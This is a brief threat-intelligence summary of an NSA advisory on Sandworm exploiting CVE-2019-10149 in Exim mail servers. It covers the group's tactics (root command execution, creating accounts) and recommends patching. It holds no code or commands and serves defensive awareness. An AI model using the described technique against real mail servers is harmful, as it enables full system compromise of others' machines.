Full Report
On May 28, 2020, the NSA released a cybersecurity advisory on Russian APT group Sandworm exploiting CVE-2019-10149, a vulnerability in Exim Mail Transfer Agent (MTA) software. An unauthenticated remote attacker can use this vulnerability to send a specially crafted email to ex...
Analysis Summary
# Threat Actor: Sandworm
## Attribution & Identity
* **Identification:** Russian APT group.
* **Known Aliases:** (Not explicitly listed in the provided text, but contextually associated with Russian state-sponsored activity).
* **Associated Groups:** (Not explicitly listed in the provided text).
## Activity Summary
The NSA released an advisory on May 28, 2020, detailing Sandworm actors exploiting the 1-day vulnerability, CVE-2019-10149, in Exim Mail Transfer Agent (MTA) software.
## Tactics, Techniques & Procedures
* **Exploitation of Vulnerability:** Exploiting CVE-2019-10149 in Exim MTA. (This is used for Initial Access).
* **Privilege Escalation:** The exploit allows an unauthenticated remote attacker to execute commands with **root privileges**.
* **Post-Exploitation Actions:** Installing programs, modifying data, and creating new accounts.
## Targeting
* **Sectors:** Organizations utilizing Exim Mail Transfer Agent (MTA) software.
* **Geography:** (Not specified in the provided text).
* **Victims:** (No specific organizations named in the provided text, but implied to be users of vulnerable Exim installations).
## Tools & Infrastructure
* **Malware Families Used:** (Not mentioned in the provided text).
* **Infrastructure (C2, domains, IPs):** (Not mentioned in the provided text).
## Implications
Sandworm utilized a known vulnerability (CVE-2019-10149) for initial access, immediately gaining the highest level of system control (root privileges) on vulnerable Linux/Unix mail servers. This allows for complete system compromise.
## Mitigations
* **Patching/Updating:** Apply patches or mitigations for CVE-2019-10149 affecting Exim MTA software.
* **Vulnerability Management:** Address 1-day vulnerabilities promptly, as actors like Sandworm rapidly weaponize them for initial access.